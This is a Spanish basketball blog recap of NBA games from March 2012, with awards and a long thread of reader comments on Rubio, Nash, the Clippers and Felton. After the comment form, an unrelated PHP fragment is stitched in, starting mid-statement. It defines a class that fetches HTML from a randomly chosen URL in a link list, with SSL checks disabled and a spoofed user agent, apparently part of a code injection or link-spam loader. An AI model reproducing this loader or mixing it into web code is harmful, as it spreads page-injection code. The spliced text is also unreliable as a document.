La crónica: noche de duetos

02 de March de 2012 por TheDeerHunter

Durant y Westbrook monopolizaron el juego ofensivo de los Thunder ante una gran versión colectiva de Orlando. 38 de uno, 29 del otro y el tercero en discordia, Harden, no llegaba a los 15 puntos. Hasta 5 hombres de los Magic estaban en dobles figuras, pero flojeó el banco. 2 monstruos imparables valen más que uno.

Por su parte, la baja de Bosh obligaba a LeBron y Wade a aplicarse. Igual… 38 uno y 33 el otro y alrededor no crece la hierba, mientras que por parte de los Blazers 5 en dobles figuras pero ningún bicho. Queda claro el modelo que se impuso anoche. Nuevamente Crawford de base en Portland y Felton cada vez más desahuciado. Mucho lujo contra un rival que te hace pagar cada pérdida que cometas.

Partidazo en Sacramento. Los Clippers sufrieron de lo lindo ante los arreones de los Kings. Finalmente lograron imponer su mayor calidad encontrando petróleo en la recuperación de Bobby Simmons, junto el buen hacer de Mo Williams desde el banco.

Finalmente los Wolves vuelven a alejarse de postemporada con su derrota en Phoenix. Lección magistral de Nash a Ricky. 17 asistencias que le regalaban dobles figuras a la mayoría de sus compañeros. Pocos podrían hacer carburar a esa plantilla como él.

PREMIOS

MVP: En la noche de duetos ganan la de los Heat a la de los Thunder, pero nos quedamos con la actuación de LeBron con 38 ptos, 11 rebotes, 6 asistencias, 5 robos y 1 tapón. Completita.

El rookie: Freddette tuvo momentos vibrantes donde levantó a la grada de sus asientos. Lo malo es que sólo lo pudo hacer durante 13 minutos contados. 11 ptos con 3 triplazos, 2 rebotes, 3 asistencias en esos escasos instantes.

La sorpresa: Gran actuación, decisiva, de Bobby Simmons. Sería un fichaje fantástico para los Clippers si vuelve a estar operativo. No lo busquéis en la hoops, que ya lo he cazado yo.

La decepción: Seguro que en Orlando esperan mucho más del dúo Redick-Davis desde el banco. 2-14 entre ambos anoche. Con un mínimo de rendimiento de ellos, hubieran firmado la victoria ante los Thunder.

El mayor esfuerzo en vano: Howard inmenso en el escaparate. 33 ptos, 9 rebotes, 2 asistencias, 2 robos y 1 taponazo rozando el goaltending.

TOP 10

Comenta

15 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Está claro que las estrellas lo son por algo. Ganan partidos y campeonatos.
    Durantula y Westbrook siguen impulsando a los Thunder a pesar de que Superman se comió con patatas a una de las mejores defensas interiores de la liga pero es que Durant está mejor y más decisivo que nunca y es difícil contrarrestar sus actuaciones (18 de sus 38 puntos en el último cuarto).
    En la otra costa el otro alero abusón Lebron hizo carbón a los Blazers con una actuación monstruosa acompañada por su genial escudero Flash Wade, otros que bien bailan.
    Estoy deseando ver un Thunder-Heat, que parecen los máximos candidatos a las finales.
    Ricky recibió una lección del viejo Nash y es que la experiencia y lo bueno que es este jugón es increíble. Le echaremos de menos cuando se vaya. Espero que este verano no le puedan los sentimientos y se vaya a un equipo con posibilidades de anillo para verle sus últimos años en los playoffs disputando el título. ¿Los Lakers? Serían un sitio ideal para él, vistos los bases de los de LA. El resto de candidatos al título tienen su puesto de base cubierto excepto quizás los Heat pero ahí no veo a Nash.

      Citar

  2. simon dice:
    #2

    No se yo en los Lakers como se adaptaría… mas que nada pq Nash necesita que sus aleros corran la cancha, y no veo a los aleros de Lakers ( y todos sus años encima ) corriendo la cancha, nunca lo han hecho y no creo que a estas alturas lo hagan.
    Para mi el sitio ideal serían los Heat, Entre Wade y Lebron ( excelentes defensores ) podrían contrarrestar el bajo rendimiento de Nash en este costado y en el contrataque y jugando rapido Nash podría hincharse a asistir a Wade y Lebron. No tengo dudas de que tanto Wade como Lebron dejarían que fuera Nash quien dirigiese el cotarro, estos dos jugadores quieren titulos por encima de todo y ya lo han demostrado jugando juntos asi que no creo que los Egos en este par de jugadores fuera un impedimiento enorme para que Nash firmase por los Heat.

      Citar

  3. simon dice:
    #3

    Aunque a mi donde mas me gustaría verlo seria en un retorno a Dallas con Howard firmando por estos, pero parece que a Dallas va Deron asi que eso descartaria el regreso de Nash junto a Nowitzky

      Citar

  4. Sancho88 dice:
    #4

    Hombre, Simmons creo que tuvo una temporada de 15 puntos por partido en Clippers, y estaba claro que les hacía falta un alero para espabilar a Butler, que con competencia puede subir su rendimiento. Al menos, ahora tiene algo de anotación en el banquillo Del Negro, porque vaya añito… si Clippers se asientan en los 100 puntos por partido, tendrán mucho hecho, porque en defensa son muy buenos. No pude ver el partido ayer, porque ando estos días con vértigo y prefiero descansar. Tanta NBA acaba pasando factura, jeje. Pues esa es la rotación de Kings. Jimmer en casa es una metralleta, cuando sale en momentos puntuales es capaz de desatascar al equipo, aunque aún no está capacitado para ser consistente en 5×5, y su defensa es lamentable. El problema es que yo creo que será un Korver de la vida, solo para tirar y poco más… y es una pena, porque yo creo que sí tiene sangre, si tiene espíritu y si mejora en defensa (el ejemplo es Boykins, un tipo tan pequeño pero peligrosísimo robando balones), podría acabar siendo titular. No sé, su altura es su gran hándicap…

      Citar

  5. Esteban dice:
    #5

    q pasa con ricky? esta en su rookie wall? tanto el como su equipo se estan alejando de los premios de postemporada y ROY, una pena verdaderamente

      Citar

  6. Sancho88 dice:
    #6

    Sí, está claro que Ricky está de bajona, el muchacho. Pero de todas maneras su temporada yo la calificaría de notable alto, casi rozando el sobresaliente. Yo me esperaba que todos los partidos como mucho hiciera lo que hizo anoche, asi que…11 puntos-4 rebotes-8 asistencias-2 robos de mdia creo que es el doble de lo que todos esperábamos no? En porcentajes de triples no va mal, ahora bien, los de tiros de campo… ni Tyreke, jejej. Ahí tiene que meterle trabajo y no echarse la presión encima. Tiene capacidad de sobra para estar en +40%…
    Dicho esto, sí, está de rookie wall, pero supongo que necesita descanso y algún partido que otro jugando menos minutos. Creo que Minnesota tiene que espabilar si no quiere perder el tren de los de arriba. Sería una pena que después de jugar una gran temporada, no acabaran luchando por el premio gordo, que para ellos sería meterse en Playoffs

      Citar

  7. Esteban dice:
    #7

    anoche fueron 14 puntos y dos asistencias sancho
    igualmente, no son malos malos numeros, pero ha decaido en su rendimiento el y su equipo, creo que lo dije no? minnesota necesita cambios, en primer lugar liberar a beasley, luego a barea y no renovar bajo ninguna circunstancia a miller, randholph ni webster, si libera todo ese espacio y se queda con el bloque, ricky, williams, love y pekovic, pueden tener un futuro interesante

    ahora, les pregunto, de quien fue la genial idea de renovar por 3 años a love y permitirle salirse en el cuarto? estaba loco quien lo hizo? una vez que minnesota tiene un all star, uno de los 3 o 4 mejores de su posicion en la nba, no lke ofrecen el maximo y no se lo aseguran por largo rato… le hacen un contrato igual de largo q a milic y menos que a barea, solo por no pagar el maximo?

    mamita q direngencia tienen los wolves…

      Citar

  8. Sancho88 dice:
    #8

    Los números que he puesto yo son de media de temporada, no del partido de ayer

      Citar

  9. Esteban dice:
    #9

    ah esta bien

    sobre loc clippers, hace rato que vengo reclamando que necesitan imperiosamente un alero mas capaz que gomes desde la banca, sobretodo que pueda traer punto y algo de fluidez en ataque, bueno quiza sea simmons la respuesta, yo hubiese preferido que vayan por al thorton, pero quiza sea bastante mas caro

    tamb me hubiese gustado que probran con gerald green que la rompio en la liga de desarrollo y ahora debuto con buen pie en los nets, si anda bien es un desperdicio que juegue en una franquicia q este año no va a ningun lado y hubiese sido de ayuda en la posicion de escolta para los clippers

    todo esto, por que evidentemente no quieren fichar a nadie con un contrato largo, y nadie parece querer asumir el contrato de Mo, una pena por que con algun retoque (como Morrow por foye) estos clippers podrian ser mas que un mero candidato a segunda ronda

      Citar

  10. nba dice:
    #10

    Felton menuda depresión debe de tener el tio, a los Lakers ya !!!
    Hoy creo que Kobe nos deleitara con uno de sus partidos en los que se tira todo aprovechnado que es contra los Kings

      Citar

  11. Sancho88 dice:
    #11

    Esteban:
    ah esta bien

    sobre loc clippers, hace rato que vengo reclamando que necesitan imperiosamente un alero mas capaz que gomes desde la banca, sobretodo que pueda traer punto y algo de fluidez en ataque, bueno quiza sea simmons la respuesta, yo hubiese preferido que vayan por al thorton, pero quiza sea bastante mas caro

    tamb me hubiese gustado que probran con gerald green que la rompio en la liga de desarrollo y ahora debuto con buen pie en los nets, si anda bien es un desperdicio que juegue en una franquicia q este año no va a ningun lado y hubiese sido de ayuda en la posicion de escolta para los clippers

    todo esto, por que evidentemente no quieren fichar a nadie con un contrato largo, y nadie parece querer asumir el contrato de Mo, una pena por que con algun retoque (como Morrow por foye) estos clippers podrian ser mas que un mero candidato a segunda ronda

    Tu crees que solo tienen equipo para segunda ronda? Quizá la baja de Billups les quite posibilidades de llegar a la Final de Conferencia, pero si aparece Simmons o quien sea para dar puntos desde el banquillo, y mejoran en record en la regular para evitar a Oklahoma hasta la final… yo mantendría a Clippers como segundo favorito tras Oklahoma. Luego, habrá que ver, ya que Spurs, Mavericks y Lakers pueden ser peligrosos en cualquier serie… De todas formas, Simmons solo parece un parche. Ya lo dijiste tú, pero en general fue un clamor, que este equipo necesitaba anotación en los aleros aparte de Butler, que no creíamos que Foye y Gomes fueran garantías, y si al menos, el puesto de pívot lo cubren con Jordan en defensa, Kenyon Martin no es de momento la solución en ataque como pívot suplente, y desde luego, no parece ser Simmons una solución fiable en cruces contra Spurs, Mavs, Thunder… sí, quizá sus aspiraciones reales no sean finales, y es una pena y una ocasión única que han desaprovechado. Nunca se sabe qué puede pasar en próximos años. Lebron llegó a las finales con el peor equipo posible, y luego, bien reforzdo y tal en los Cavs, ya no llegó nunca más. Las oportunidades están para aprovecharlas, y Clippers ha tenido miedo de llegar demasiado lejos. No voy a decir que es un chollete como cabeza de serie, pero entre Spurs, Thunder y Mavs, sí parecen el rival más ‘facilito’ para cruzarte. Y eso si consiguen mantener la marca por delante de Lakers. Yo creo que Dallas irá para arriba, tiene toda la pinta

      Citar

  12. Sancho88 dice:
    #12

    Por cierto, para Denise, y totalmente en serio. Explícame lo de McMillan… 18-18 con estos tíos. Quién les falta? No me vale lo de Roy y lo de Oden. Creo que están siendo la gran decepción de la temporada, quinto presupuesto de la liga y haciendo reir. No sé yo si acabarán por encima del 50%. Y yo digo que la culpa no es de jugadores, ni de plantilla corta. Tienen calidad de sobra para estar 4º-5º de conferencia. Y actualmente no les veo remontando el vuelo, sino todo lo contrario. Un desastre, tío…

      Citar

  13. Vader dice:
    #13

    Sancho88:
    Por cierto, para Denise, y totalmente en serio. Explícame lo de McMillan… 18-18 con estos tíos. Quién les falta? No me vale lo de Roy y lo de Oden. Creo que están siendo la gran decepción de la temporada, quinto presupuesto de la liga y haciendo reir. No sé yo si acabarán por encima del 50%. Y yo digo que la culpa no es de jugadores, ni de plantilla corta. Tienen calidad de sobra para estar 4º-5º de conferencia. Y actualmente no les veo remontando el vuelo, sino todo lo contrario. Un desastre, tío…

    Sobre esto no se que pasa con Felfon… ¿Porque ha dejado de ser titular? ¿Es verdad que esta jugando con Crawford de base titular? Y lo más importante ¿¿Alguien sabe porque todo esto??

      Citar

  14. melo15 dice:
    #14

    Porque Felton esta jugando fatal

      Citar

  15. MagicJohnson32 dice:
    #15

    Felton llegó a la temporada gordo y lento (más gordo y más lento de lo que suele llegar cada año), y ya se sabe que McMillan es de los que no perdonan. Además, ha pasado de jugar en el sistema D’Antoni, que favorece tanto a los bases, a esto (con unos meses en los Nuggets entre lo uno y lo otro), y no se ha adaptado bien. Los anti McMillan lo culparán del bajo rendimiento de Felton (y yo no digo que no haya algo de cierto), pero éste deja que desear en cuanto a profesionalidad y actitud.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>